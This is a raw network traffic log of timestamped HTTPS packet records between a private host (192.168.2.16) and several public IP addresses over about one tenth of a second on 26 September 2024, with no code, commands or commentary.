Sep 26, 2024 17:55:28.791207075 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.791241884 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.791243076 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.791260004 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.791302919 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.791321039 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.794573069 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.794604063 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.794630051 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.794660091 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.794687033 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.794702053 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.794718981 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.794737101 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.798532963 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.798579931 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.798605919 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.798607111 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.798625946 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.798650026 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.799026012 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.799071074 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.799077988 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.801647902 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.801681042 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.801707029 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.801712990 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.801729918 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.801747084 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.801836967 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.801870108 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.801877975 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.802592039 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.802630901 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.802645922 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.802660942 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.802695036 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.802699089 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.802710056 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.802747965 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.802753925 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.807168007 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.807240963 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.807244062 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.807260990 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.807296038 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.807296991 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.807308912 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.807352066 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.807358027 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.812072992 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.812105894 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.812140942 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.812158108 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.812175989 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.812189102 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.812218904 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.812251091 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.812259912 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.813848972 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.813905001 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.813920975 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.813954115 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.813977003 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.813992023 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.813998938 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.814033031 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.814038992 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.821125984 CEST	443	49754	216.58.212.142	192.168.2.16
Sep 26, 2024 17:55:28.821405888 CEST	49754	443	192.168.2.16	216.58.212.142
Sep 26, 2024 17:55:28.821432114 CEST	443	49754	216.58.212.142	192.168.2.16
Sep 26, 2024 17:55:28.821825981 CEST	443	49754	216.58.212.142	192.168.2.16
Sep 26, 2024 17:55:28.821894884 CEST	49754	443	192.168.2.16	216.58.212.142
Sep 26, 2024 17:55:28.822346926 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.822392941 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.822393894 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.822411060 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.822443962 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.822452068 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.822570086 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.822602987 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.822608948 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.822640896 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.822671890 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.822679043 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.822686911 CEST	443	49754	216.58.212.142	192.168.2.16
Sep 26, 2024 17:55:28.822736979 CEST	49754	443	192.168.2.16	216.58.212.142
Sep 26, 2024 17:55:28.822751045 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.822788000 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.822788000 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.822799921 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.822829962 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.822848082 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.823034048 CEST	49754	443	192.168.2.16	216.58.212.142
Sep 26, 2024 17:55:28.823112965 CEST	443	49754	216.58.212.142	192.168.2.16
Sep 26, 2024 17:55:28.823370934 CEST	49754	443	192.168.2.16	216.58.212.142
Sep 26, 2024 17:55:28.823381901 CEST	443	49754	216.58.212.142	192.168.2.16
Sep 26, 2024 17:55:28.826383114 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.826416969 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.826438904 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.826448917 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.826491117 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.826571941 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.826618910 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.826652050 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.826658010 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.828722000 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.828783035 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.828789949 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.828799963 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.828829050 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.828835964 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.828885078 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.828917980 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.828924894 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.829036951 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.829070091 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.829073906 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.829086065 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.829118013 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.829123974 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.829173088 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.829207897 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.829214096 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.833415031 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.833448887 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.833463907 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.833471060 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.833503962 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.833566904 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.834001064 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.834039927 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.834047079 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.834089041 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.834121943 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.834126949 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.834471941 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.834498882 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.834515095 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.834520102 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.834553957 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.839181900 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.839258909 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.839287043 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.839309931 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.839318991 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.839361906 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.839473963 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.840941906 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.841003895 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.841027975 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.841073036 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.841108084 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.841119051 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.841126919 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.841160059 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.841169119 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.841176033 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.841219902 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.841221094 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.841233015 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.841274977 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.841301918 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.846657991 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.846698999 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.846715927 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.846734047 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.846750021 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.846782923 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.846811056 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.846843004 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.846859932 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.846873045 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.846924067 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.850260973 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.850342035 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.850409985 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.850410938 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.850430965 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.850478888 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.850490093 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.850508928 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.850573063 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.854677916 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.854718924 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.854767084 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.854772091 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.854795933 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.854820013 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.854832888 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.854865074 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.854876995 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.854887009 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.854927063 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.854940891 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.854950905 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.854985952 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.854988098 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.855000019 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.855046034 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.855053902 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.855653048 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.855700016 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.855704069 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.855711937 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.855748892 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.855777025 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.855829954 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.855865002 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.855871916 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.858278036 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.858462095 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.858491898 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.858519077 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.858530045 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.858592987 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.858838081 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.860552073 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.860594988 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.860627890 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.860630035 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.860647917 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.860675097 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.860686064 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.860726118 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.860733986 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.862853050 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.862883091 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.862914085 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.862921953 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.862931967 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.862955093 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.862974882 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.863019943 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.863027096 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.867290974 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.867332935 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.867368937 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.867372990 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.867382050 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.867429018 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.867458105 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.867487907 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.867510080 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.867517948 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.867552996 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.867559910 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.867599010 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.867630005 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.867640018 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.867646933 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.867686987 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.867691994 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.867759943 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.867795944 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.867820978 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.867825985 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.867837906 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.867867947 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.867899895 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.867927074 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.867944956 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.867954969 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.867994070 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.871673107 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.871716022 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.871740103 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.871747971 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.871790886 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.871798038 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.871877909 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.871913910 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.871920109 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.872781038 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.872839928 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.872879028 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.872884989 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.872975111 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.873006105 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.873023987 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.873032093 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.873073101 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.873246908 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.873317003 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.873341084 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.873351097 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.873363018 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.873382092 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.873394012 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.876203060 CEST	49754	443	192.168.2.16	216.58.212.142
Sep 26, 2024 17:55:28.877213001 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.877262115 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.877331972 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.877558947 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.877571106 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.879724979 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.879779100 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.879782915 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.879806995 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.879853964 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.879858017 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.879867077 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.879906893 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.879914045 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.890424013 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.890470028 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.890503883 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.890522003 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.890544891 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.890573978 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.890594959 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.890638113 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.890645981 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.894670963 CEST	49761	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.894707918 CEST	443	49761	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.894779921 CEST	49761	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.895375013 CEST	49761	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.895395041 CEST	443	49761	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.901242018 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.901278019 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.901325941 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.901340961 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.901371956 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.901381969 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.901390076 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.901429892 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.901437998 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.902857065 CEST	443	49752	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.902923107 CEST	443	49752	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.902966022 CEST	443	49752	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.902973890 CEST	49752	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.902992010 CEST	443	49752	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.903028011 CEST	49752	443	192.168.2.16	172.217.16.132
